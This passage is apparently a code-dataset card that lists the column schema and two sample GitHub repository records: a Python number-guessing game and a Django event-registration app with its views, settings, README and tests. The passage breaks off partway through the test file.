Dataset schema:

column               type            range / distinct values
-------------------  --------------  -----------------------
repo_name            string          length 5 – 114
repo_url             string          length 24 – 133
snapshot_id          string          length 40
revision_id          string          length 40
directory_id         string          length 40
branch_name          string          209 distinct values
visit_date           timestamp[ns]
revision_date        timestamp[ns]
committer_date       timestamp[ns]
github_id            int64           9.83k – 683M
star_events_count    int64           0 – 22.6k
fork_events_count    int64           0 – 4.15k
gha_license_id       string          17 distinct values
gha_created_at       timestamp[ns]
gha_updated_at       timestamp[ns]
gha_pushed_at        timestamp[ns]
gha_language         string          115 distinct values
files                list            1 – 13.2k items
num_files            int64           1 – 13.2k
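Each row pairs the repo-level columns above with a nested `files` list of per-file records; as the sample rows below show, each file entry carries keys such as `path`, `language`, `length_bytes`, `license_type`, and the raw `text`. A minimal sketch of how a dataset with this schema could be streamed and inspected with the Hugging Face `datasets` library — the dataset identifier here is a placeholder, not the real path:

```python
from datasets import load_dataset

# Placeholder identifier: substitute the actual dataset path on the Hub.
ds = load_dataset("some-org/some-code-dataset", split="train", streaming=True)

for record in ds:
    # Repo-level scalar columns from the schema above.
    print(record["repo_name"], record["branch_name"], record["num_files"])

    # `files` is a list of per-file dicts; the key names below match the
    # sample rows shown in this card.
    for f in record["files"]:
        if f["language"] == "Python":
            print(" ", f["path"], f["length_bytes"], "bytes")

    break  # inspect only the first record
```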
Sample rows:

repo_name: andrewporritt1977/python_game
repo_url: https://github.com/andrewporritt1977/python_game
snapshot_id: 04bdc561d567f8feab9e4163d74a5b8e067c374a
revision_id: f0a5d875a4238183650e60342cd27886189e0cae
directory_id: db1e4dc132771a0640885a92e40d5ca27df0fbc8
branch_name: refs/heads/master
visit_date: 2021-03-07T08:59:18.583697
revision_date: 2020-03-10T15:33:59
committer_date: 2020-03-10T15:33:59
github_id: 246,256,095
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: 2020-03-10T09:16:21
gha_updated_at: 2020-03-10T14:40:58
gha_pushed_at: 2020-03-10T15:20:39
gha_language: Python
files:
[ { "alpha_fraction": 0.5275229215621948, "alphanum_fraction": 0.5321100950241089, "avg_line_length": 18.909090042114258, "blob_id": "1aa194398ee31f233862fc68916dc03ac89aad84", "content_id": "cf1ab901fc56d418bae3133215becc91896993a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/Player.py", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "class Player:\n score = 0\n\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name + \" \" + str(self.score)\n\n def addToScore(self, value):\n self.score += value" }, { "alpha_fraction": 0.5875251293182373, "alphanum_fraction": 0.5875251293182373, "avg_line_length": 28.294116973876953, "blob_id": "f88fc554f06b89a504157f941eacfcb4bab5c0f3", "content_id": "4ec0fb8fdb2ea18c62df9514664bd17838d67fd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 95, "num_lines": 17, "path": "/Leaderboard.py", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "from operator import attrgetter\n\nclass Leaderboard:\n listOfPlayers = []\n\n def addPlayerToList(self, player):\n self.listOfPlayers.append(player)\n\n def printLeaderBoard(self):\n print (\"********************\")\n print (\"** Leaderboard **\")\n print (\"********************\")\n\n sortedListOfPlayers = sorted(self.listOfPlayers, key=attrgetter('score'), reverse=True)\n\n for i in range(len(sortedListOfPlayers) ): \n print(sortedListOfPlayers[i])" }, { "alpha_fraction": 0.4066760838031769, "alphanum_fraction": 0.41560885310173035, "avg_line_length": 32.234375, "blob_id": "633433bfccb4bd5fda03713e7597f2cc51101134", "content_id": "d8c3e986ea4c91a8b9762b8736ebdf5b36597629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2127, "license_type": "no_license", "max_line_length": 98, "num_lines": 64, "path": "/app.py", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "from Leaderboard import Leaderboard\nfrom Player import Player\nimport os\nimport time\nimport random\n\n\n\nclass Main:\n os.system('clear')\n print (\"********************\")\n print (\"** Number Guess **\")\n print (\"********************\")\n time.sleep(1)\n\n def game():\n os.system('clear')\n target = random.randint(1,10)\n player = Player(input(\"Please enter your name - \"))\n round = 3\n\n play_round = input('Would you like to play a round? 
(y/n)')\n\n while play_round == 'y':\n\n i = 0\n while i < round :\n \n try:\n guess = int(input(\"Guess my number please?\\nIt's between 1 and 10\\nYou have \" \n + str(3-i) + \" guesses left.\\nYou are on level - \" \n + str(player.score+1) + \"\\n\"))\n if guess == target :\n print('\\nYou have been successful ' \n + player.name + ' the number was ' \n + str(target))\n player.addToScore(1)\n print('your score is ' + str(player.score))\n i = 0\n target = random.randint(1,10)\n elif guess < target:\n print('\\nHigher')\n i += 1\n continue\n elif guess > target:\n print('\\nLower')\n i += 1\n continue\n \n except (TypeError, ValueError):\n print(\"Sorry, numbers only please\")\n continue\n \n print('\\nYa done \\nThe number you were looking for was ' + str(target))\n play_round = 'n'\n\n leaderboard = Leaderboard()\n leaderboard.addPlayerToList(player)\n leaderboard.printLeaderBoard()\n play_again = input('Another player (y/n)')\n if play_again == 'y':\n time.sleep(1)\n Main.game()\nMain.game()\n" }, { "alpha_fraction": 0.6329113841056824, "alphanum_fraction": 0.6329113841056824, "avg_line_length": 7.666666507720947, "blob_id": "5a39bc4d157b961a8b08eb0c42a92597fda2d58e", "content_id": "ce9f557a31090ca1b8c4bf99031610f5a8d8443d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 19, "num_lines": 9, "path": "/README.md", "repo_name": "andrewporritt1977/python_game", "src_encoding": "UTF-8", "text": "# python_game\n\nTo run just type:\n\n```\npython app.py \n```\n\ninto the temrminal. \n" } ]
num_files: 4
repo_name: gotzl/registration-app
repo_url: https://github.com/gotzl/registration-app
snapshot_id: 200fa7a422d8a8c081a0c04c5bbe1d2fee220e85
revision_id: 76fc2d946d98089c7b454f5b0eda932bb2780976
directory_id: 0a85e17529705e38fb437381dcd36ab6b7aaf45d
branch_name: refs/heads/master
visit_date: 2022-11-17T21:31:06.568094
revision_date: 2022-11-12T12:25:21
committer_date: 2022-11-12T12:25:21
github_id: 236,800,162
star_events_count: 1
fork_events_count: 0
gha_license_id: BSD-3-Clause
gha_created_at: 2020-01-28T17:52:04
gha_updated_at: 2021-11-16T12:00:54
gha_pushed_at: 2022-04-23T08:52:13
gha_language: Python
files:
[ { "alpha_fraction": 0.6269771456718445, "alphanum_fraction": 0.6289040446281433, "avg_line_length": 35.524925231933594, "blob_id": "32be3f9e11a16a3a1dd02d929ddd23e0cff4b2af", "content_id": "507f16306def8a6580f797c94968b9890743d488", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12456, "license_type": "permissive", "max_line_length": 109, "num_lines": 341, "path": "/registration/views.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import os\nfrom django import forms\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ValidationError, NON_FIELD_ERRORS\nfrom django.forms import models, ChoiceField\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse_lazy, reverse\nfrom django.utils.safestring import mark_safe\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.utils.translation import gettext_lazy as _, ngettext_lazy\n\nfrom material import Layout, Fieldset, Row, Span2, Span5\n\nfrom registration.models import Subject, Event\nfrom registration.sub_table_tex import create_table\n\nfrom mysite import settings\n\n\ndef active_events():\n return Event.objects.filter(\n is_active=True, enable_on__lte=timezone.now(), disable_on__gte=timezone.now())\n\n\ndef assign_seats(ev, instance, num_seats):\n subs = Subject.objects.filter(event=ev).order_by('seats')\n taken, seats = [], []\n for s in subs:\n # don't add subjects seats to list of taken seats, reassign below\n if instance.pk and s == instance:\n continue\n taken.extend(map(int, s.seats.split(',')))\n # seat numbers start at 1\n for i in range(1, ev.num_total_seats+1):\n if i not in taken: seats.append(i)\n if len(seats) == num_seats:\n break\n if len(seats) != num_seats:\n raise ValidationError(\"Unable to assign seats\", code='invalid')\n instance.seats = ','.join(map(str, seats))\n\n\nclass EventsAvailableMixin:\n def dispatch(self, request, *args, **kwargs):\n events = active_events()\n if events.count()==0:\n return render(request, 'registration/no_events.html')\n\n if sum([ev.seats_taken<ev.num_total_seats for ev in events]) == 0:\n return render(request, 'registration/no_seats.html')\n\n return super().dispatch(request, *args, **kwargs)\n\n\nclass CustomModelChoiceIterator(models.ModelChoiceIterator):\n def choice(self, obj):\n return (self.field.prepare_value(obj),\n '%s%s'%(self.field.label_from_instance(obj),\n '' if obj.seats_taken<obj.num_total_seats else ' - '+str(_('booked_out'))))\n\n\nclass CustomModelChoiceField(models.ModelChoiceField):\n def _get_choices(self):\n if hasattr(self, '_choices'):\n return self._choices\n return CustomModelChoiceIterator(self)\n choices = property(_get_choices,\n ChoiceField._set_choices)\n\n\ndef _gen_layout():\n layout_subject_extended = Layout(\n Row('event'),\n Row('num_seats'),\n Fieldset('Personal Information',\n Row('given_name', 'name'),\n Row('email', 'phone'),\n Row(Span2('post_code'), Span5('city')),\n 'address'),\n )\n layout_subject_base = Layout(\n Row('event'),\n Row('num_seats'),\n Fieldset(_('Personal Information'),\n Row('given_name', 'name'),\n Row('email')),\n )\n return layout_subject_extended if settings.SUBJECT_CLASS == 'SubjectExtended' else layout_subject_base\n\n\nclass SubjectForm(forms.ModelForm):\n layout = _gen_layout()\n\n def __init__(self, *args, **kwargs):\n super(SubjectForm, self).__init__(*args, 
**kwargs)\n instance = getattr(self, 'instance', None)\n # do not allow to modify the email and event for a registration\n if self.instance and instance.pk:\n self.fields['event'].disabled = True\n self.fields['email'].disabled = True\n\n def clean_num_seats(self):\n instance = getattr(self, 'instance', None)\n if self.instance and instance.pk:\n ev = self.instance.event\n else:\n if not self.data['event']:\n return self.cleaned_data['num_seats']\n ev = self.cleaned_data['event']\n\n if self.cleaned_data['num_seats'] > ev.num_max_per_subject:\n raise ValidationError(ngettext_lazy(\n 'max_seats_subj_exceeded_%(num_max)i',\n 'max_seats_subj_exceeded_pl_%(num_max)i',\n ev.num_max_per_subject),\n code='invalid',\n params={'num_max': ev.num_max_per_subject})\n\n if self.instance and instance.pk:\n taken = ev.seats_taken\n\n # allow subject to decrease registration even if all seats are taken\n if taken >= ev.num_total_seats:\n if self.cleaned_data['num_seats'] > instance.num_seats:\n raise ValidationError(_('no_seats_event'), code='invalid')\n # if not all seats are taken, allow subject to fill up seats up to num_total_seats\n elif taken-instance.num_seats+self.cleaned_data['num_seats'] > ev.num_total_seats:\n raise ValidationError(ngettext_lazy(\n 'max_seats_exceeded_%(num_free)i',\n 'max_seats_exceeded_pl_%(num_free)i',\n ev.num_total_seats-taken), code='invalid', params={'num_free': ev.num_total_seats-taken})\n\n else:\n taken = ev.seats_taken\n # it is not possible to create a registration when there are no more seats available\n if taken >= ev.num_total_seats:\n raise ValidationError(_('no_seats_event'), code='invalid')\n\n # it is not possible to exceed the number of available seats\n if taken+self.cleaned_data['num_seats'] > ev.num_total_seats:\n raise ValidationError(ngettext_lazy(\n 'max_seats_exceeded_%(num_free)i',\n 'max_seats_exceeded_pl_%(num_free)i',\n ev.num_total_seats-taken), code='invalid', params={'num_free': ev.num_total_seats-taken})\n\n assign_seats(ev, instance, self.cleaned_data['num_seats'])\n return self.cleaned_data['num_seats']\n\n class Meta:\n model = Subject\n fields = ['name', 'given_name', 'email', 'event', 'num_seats']\n if settings.SUBJECT_CLASS == 'SubjectExtended':\n fields.extend(['phone', 'address', 'post_code', 'city'])\n error_messages = {\n NON_FIELD_ERRORS: {\n 'unique_together': \"Es existiert bereits eine Registrierung für diese %(field_labels)s.\",\n }\n }\n\n\nclass SubjectFormCreate(SubjectForm):\n layout = _gen_layout()\n if settings.PRIVACY_NOTICE:\n layout.elements.append(Fieldset(_('_privacy'), Row('privacy')))\n\n def __init__(self, *args, **kwargs):\n super(SubjectFormCreate, self).__init__(*args, **kwargs)\n # do not allow to modify the email and event for a registration\n if settings.PRIVACY_NOTICE:\n self.fields['privacy'] = forms.BooleanField()\n self.fields['privacy'].label = _('confirmed')\n self.fields['privacy'].help_text = mark_safe(_('privacy_notice'))\n\n\nclass SubjectFormAdmin(forms.ModelForm):\n def clean_num_seats(self):\n instance = getattr(self, 'instance', None)\n if self.instance and instance.pk:\n ev = self.instance.event\n else:\n if not self.data['event']:\n return self.cleaned_data['num_seats']\n ev = self.cleaned_data['event']\n\n assign_seats(ev, instance, self.cleaned_data['num_seats'])\n return self.cleaned_data['num_seats']\n\n class Meta:\n model = Subject\n fields = ['name', 'given_name', 'email', 'event', 'num_seats',\n 'status_confirmed', 'confirmation_request_sent',\n 'reminder_sent', 
'confirmation_sent']\n\n\nclass CreateSubjectView(EventsAvailableMixin, generic.CreateView):\n form_class = SubjectFormCreate\n template_name = 'registration/subject_form_create.html'\n success_url = reverse_lazy('submitted')\n\n def get_context_data(self, **kwargs):\n context = super(CreateSubjectView, self).get_context_data(**kwargs)\n context['form'].fields['event'] = CustomModelChoiceField(\n widget = forms.Select,\n queryset = active_events()\n )\n return context\n\n\nclass SubjectView(generic.UpdateView):\n model = Subject\n slug_field = 'token'\n form_class = SubjectForm\n template_name = 'registration/subject_form.html'\n\n\nclass SubjectViewAdminBase(LoginRequiredMixin):\n model = Subject\n form_class = SubjectFormAdmin\n success_url = reverse_lazy('subjects')\n\n\nclass SubjectViewAdmin(SubjectViewAdminBase, generic.UpdateView):\n template_name = 'registration/subject_form.html'\n\n\nclass CreateSubjectViewAdmin(SubjectViewAdminBase, generic.CreateView):\n template_name = 'registration/subject_form_create.html'\n\n\ndef submitted(request):\n return render(request, 'registration/submitted.html')\n\n\ndef confirm(request, token):\n sub = get_object_or_404(Subject.objects.filter(token=token))\n sub.status_confirmed = True\n sub.save()\n return render(request, 'registration/confirm.html', {'subject': sub, 'event': sub.event})\n\n\nclass DeleteSubjectView(generic.DeleteView):\n model = Subject\n slug_field = 'token'\n success_url = reverse_lazy('index')\n template_name = 'registration/subject_confirm_delete.html'\n\n\nclass FilterForm(forms.Form):\n event = forms.ModelChoiceField(\n queryset=Event.objects.all(),\n empty_label=\"(All)\",\n widget=forms.Select(attrs={\"onChange\":'filter(this)'}))\n\n\nclass ListSubjectView(LoginRequiredMixin, generic.ListView):\n model = Subject\n template_name = 'registration/subject_list.html'\n\n def get_queryset(self):\n filter_val = self.request.GET.get('event', None)\n if filter_val is None:\n return super(ListSubjectView, self).get_queryset()\n\n queryset = Subject.objects.filter(event=filter_val)\n\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super(ListSubjectView, self).get_context_data(**kwargs)\n context['filter'] = FilterForm()\n filter_val = self.request.GET.get('event', None)\n if filter_val is not None:\n context['filter'].fields['event'].initial = Event.objects.filter(id=filter_val).first()\n return context\n\n\nclass ListEventView(LoginRequiredMixin, generic.ListView):\n model = Event\n\n\nclass EventViewBase(LoginRequiredMixin):\n model = Event\n success_url = reverse_lazy('events')\n\n\nclass CreateEventView(EventViewBase, generic.CreateView):\n fields = ['title', 'date', 'is_active', 'enable_on', \n 'disable_on', 'num_total_seats', 'num_max_per_subject', \n 'assigned_seats','reminder_hours','hold_back_hours']\n template_name = 'registration/event_form_create.html'\n\n def get_context_data(self, **kwargs):\n context = super(CreateEventView, self).get_context_data(**kwargs)\n # context['form'].fields['date'].input_formats = ['%d.%m.%y %H:%M']\n return context\n\n\nclass EventForm(forms.ModelForm):\n seats_taken = forms.CharField(disabled=True, required=False)\n\n class Meta:\n model = Event\n fields = ['title', 'date', 'is_active', 'enable_on', \n 'disable_on', 'num_total_seats', 'num_max_per_subject', \n 'assigned_seats', 'seats_taken', 'reminder_hours', 
'hold_back_hours']\n\n\nclass EventView(EventViewBase, generic.UpdateView):\n form_class = EventForm\n template_name = 'registration/event_form.html'\n success_url = reverse_lazy('events')\n\n def get_context_data(self, **kwargs):\n context = super(EventView, self).get_context_data(**kwargs)\n context['form'].fields['seats_taken'].initial = self.object.seats_taken\n # context['form'].fields['date'].input_formats = ['%d.%m.%y %H:%M']\n return context\n\n\nclass DeleteEventView(EventViewBase, generic.DeleteView):\n pass\n\n\ndef subject_table(request, pk):\n event = get_object_or_404(Event.objects.filter(pk=pk))\n subs = Subject.objects.filter(event=event).order_by('name', 'given_name', 'email')\n file_path = create_table(event, subs)\n if os.path.exists(file_path):\n with open(file_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/pdf\")\n response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)\n return response\n raise Http404\n" }, { "alpha_fraction": 0.6198347210884094, "alphanum_fraction": 0.6253443360328674, "avg_line_length": 32, "blob_id": "63a0cdb2406b0e790de0ebc366640835428685c6", "content_id": "ff1ebf0dafa55947ce348c937a6366ebc08bd6f4", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 363, "license_type": "permissive", "max_line_length": 112, "num_lines": 11, "path": "/registration/templates/registration/subject_confirm_delete.html", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "{% extends \"registration/base.html\" %}\n{% block content %}\n\n{% load material_form %}\n{% load i18n %}\n<form method=\"post\">{% csrf_token %}\n <p>{% blocktrans %}Are you sure you want to delete the registration for {{ object }}?{% endblocktrans %}</p>\n <button type=\"submit\" name=\"_submit\" class=\"btn red\">{% trans \"Confirm\" %}</button>\n</form>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.6544715166091919, "alphanum_fraction": 0.6544715166091919, "avg_line_length": 34.14285659790039, "blob_id": "b928dadc6f69a7b9b28d277f8a04c84d2a24e3c9", "content_id": "f4ed54b065a8e394757ea95b9e491ebd4bc0a95d", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "permissive", "max_line_length": 66, "num_lines": 7, "path": "/mysite/pagetitle.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "from mysite.settings import PAGETITLE, SITE_NOTICE, PRIVACY_NOTICE\n\ndef pagetitle_context_processor(request):\n return {'pagetitle': PAGETITLE,\n 'site_notice': SITE_NOTICE,\n 'privacy_notice': PRIVACY_NOTICE,\n }\n" }, { "alpha_fraction": 0.6684473156929016, "alphanum_fraction": 0.6750355958938599, "avg_line_length": 29.35675621032715, "blob_id": "69166c8ce0758681e623f15e1bc102095900dbd5", "content_id": "f2963853be07d163132dfec70f9cfef3abe85db9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5616, "license_type": "permissive", "max_line_length": 128, "num_lines": 185, "path": "/mysite/settings.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "\"\"\"\nDjango settings for mysite project.\n\nGenerated by 'django-admin startproject' using Django 2.2.6.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/topics/settings/\n\nFor the full list of settings and their values, 
see\nhttps://docs.djangoproject.com/en/2.2/ref/settings/\n\"\"\"\n\nimport os\nimport json\nfrom django.utils.translation import gettext_lazy as _\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ['SECRET_KEY'] \\\n if 'SECRET_KEY' in os.environ else None # create a key with eg 'openssl rand -base64 32', one may also put it directly here\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True if os.getenv('DEBUG', 'False').lower() == 'true' else False\n\n# SECURITY WARNING: the default allows connections from everywhere!\nALLOWED_HOSTS = json.loads(os.environ['ALLOWED_HOSTS']) \\\n if 'ALLOWED_HOSTS' in os.environ else ['*']\n\n# the url of the page\nURL = os.environ['URL'] \\\n if 'URL' in os.environ else 'localhost'\n# url path to the page, in case it's hosted under a subpath,\n# ie if the app is hosted under 'www.somewhere.com/someevent/', use '/someevent' here\nURL_OFFSET = os.environ['URL_OFFSET'] \\\n if 'URL_OFFSET' in os.environ else '/'\n\n# the title of the page\nPAGETITLE = os.environ['PAGETITLE'] \\\n if 'PAGETITLE' in os.environ else 'some-title'\n\n# set true if site or/and privacy notice exist\nSITE_NOTICE = False\nPRIVACY_NOTICE = False\n\n# Data to store during registration: 'SubjectBase' or 'SubjectExtended', see models.py\nSUBJECT_CLASS = 'SubjectBase'\n\ntry:\n from mysite.local_settings import *\nexcept ImportError:\n raise Exception(\"A local_settings.py file is required to run this project\")\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGES = [\n ('de', _('German')),\n ('en', _('English')),\n]\n\nLANGUAGE_CODE = 'de'\n\nTIME_ZONE = 'Europe/Berlin'\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nLOCALE_PATHS = [os.path.join(BASE_DIR, 'locale')]\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'material',\n 'django_tables2',\n 'registration.apps.RegistrationConfig',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nMIDDLEWARE = [\n 'mysite.default_lang.force_default_language_middleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'mysite.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'mysite.pagetitle.pagetitle_context_processor',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.i18n',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'mysite.wsgi.application'\n\n\n# Database\n# 
https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nif os.getenv('DB_TYPE', '').lower() == 'postgres':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.getenv('DB_NAME', 'registration'),\n 'USER': os.getenv('DB_USER', 'postgres'),\n 'PASSWORD': os.getenv('DB_PASSWORD', 'postgres'),\n 'HOST': os.getenv('DB_HOST', 'postgres'),\n 'PORT': os.getenv('DB_PORT', '5432'),\n }\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n }\n\n# Password validation\n# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = 'static/'\n\n# Some URL definitions\nLOGIN_REDIRECT_URL = 'events'\nLOGOUT_REDIRECT_URL = ''\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = os.path.join(URL_OFFSET, STATIC_URL)\n\nLOGIN_URL = os.path.join(URL_OFFSET, 'accounts/login')\nLOGIN_REDIRECT_URL = os.path.join(URL_OFFSET, LOGIN_REDIRECT_URL)\nLOGOUT_REDIRECT_URL = os.path.join(URL_OFFSET, LOGOUT_REDIRECT_URL)\nFORCE_SCRIPT_NAME = URL_OFFSET\n\nBASE_URL = '%s%s'%(URL, URL_OFFSET)\n" }, { "alpha_fraction": 0.776636004447937, "alphanum_fraction": 0.7798810005187988, "avg_line_length": 37.52083206176758, "blob_id": "171fe8a28b69817e60da950435f883305f5ea362", "content_id": "890fc22d9095ae805806fb217d00f2139ccf731a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1849, "license_type": "permissive", "max_line_length": 135, "num_lines": 48, "path": "/README.md", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "A small application for allowing people to register to an event. Originally developed for the famous X-mas lecture at the ALU-Freiburg.\n\nAdmins can create events that are open for registration for a specified period.\nEvents have a limit on the number of registrants (or 'seats') per user and on the total number of registrants (or 'seats').\nAdmins can download a pdf with the registrated people for an event.\n\nUsers can register for the event. After filling the registration form, they receive \nan email with a link to confirm their registration. This is required to make sure the\nuser didn't enter a bogus email and to prevent bogus registrations.\n\nAfter users confirme the registration, they receive another email in order to confirm their confirmation.\n\n# Setup\nThe following commands have to be executed to initialize the project\n```\n# generate sql statements\npython manage.py makemigrations registration\n# if you have added/modified l10n\npython manage.py makemessages -l de -l en \npython manage.py compilemessages\n# create sql tables\npython manage.py migrate\n```\n\nIn case you want a superuser, execute\n`python manage.py createsuperuser`.\n\n\n# Deployment\nAdjust the `mysite/local_settings.py`. 
At least, you've to \n* adjust the value for `SECRET_KEY`\n* set `DEBUG=True` or set appropriate `ALLOWED_HOSTS`\n\nThese values can also be set via environment variables. \nIf you've a banner, put it in `registration/static/registration/banner.jpg`.\n\nThen, run\n```\npython manage.py runserver\n``` \nand the will be accessible at `localhost:8000/registration`.\n\nFor a proper deployment, use nginx with wsgi or s.t. like that. \nYou then need take care of your statics on your one, collect them with \n```\npython manage.py collectstatic\n```\nOne may use [gotzl/docker-django-uwsgi-nginx](https://github.com/gotzl/docker-django-uwsgi-nginx) as a starting point.\n" }, { "alpha_fraction": 0.5988964438438416, "alphanum_fraction": 0.6109932065010071, "avg_line_length": 38.266666412353516, "blob_id": "8ee72c09bb02d3f9c085f916feb597f4d91674cf", "content_id": "bd5995c1378451b55b121221a6157a3c57173c72", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4712, "license_type": "permissive", "max_line_length": 99, "num_lines": 120, "path": "/tests/tests.py", "repo_name": "gotzl/registration-app", "src_encoding": "UTF-8", "text": "import os\nimport datetime\nimport mailing\nimport names\n\nfrom django.core import mail\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom registration.models import Subject, Event\n\nmailing.DEADTIME = 0\n\n\nclass SubjectTestCase(TestCase):\n def setUp(self):\n self.ev = Event.objects.create(\n title='Test',\n num_total_seats=20,\n enable_on=timezone.now() - datetime.timedelta(days=1),\n disable_on=timezone.now() + datetime.timedelta(days=1),\n )\n\n def create_subject(self):\n name = names.get_full_name().split()\n email = '%[email protected]' % '.'.join(map(str.lower, name))\n return Subject.objects.create(\n name=name[0],\n given_name=name[1],\n email=email,\n event=self.ev,\n )\n\n def test_mailing(self):\n for i in range(20):\n subj = self.create_subject()\n mailing.confirmation_request_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # mailing.remainder_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # mailing.confirmation_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # mailing.cancellation_mail(subj)\n # print(mail.outbox[-1].subject, mail.outbox[-1].message())\n # break\n print(Subject.objects.count())\n\n def test_index_page_url(self):\n response = self.client.get('')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_form_create.html')\n\n def test_index_page_view_name(self):\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, template_name='registration/subject_form_create.html')\n\n def test_index_page_create_subject(self):\n for i in range(50):\n name = names.get_full_name().split()\n email = '%[email protected]' % '.'.join(map(str.lower, name))\n response = self.client.post(reverse('index'),\n data=dict(\n name=name[0],\n given_name=name[1],\n email=email,\n event=self.ev.pk,\n num_seats=(i % 5)+1,\n )\n )\n\n # form validation error\n if response.status_code == 200:\n break\n\n # redirected to next page\n self.assertEqual(response.status_code, 302)\n self.assertTrue(response.url.startswith('/submitted'))\n\n if i % 2:\n Subject.objects.filter(email=email).delete()\n print(self.ev.seats_taken)\n\n def 
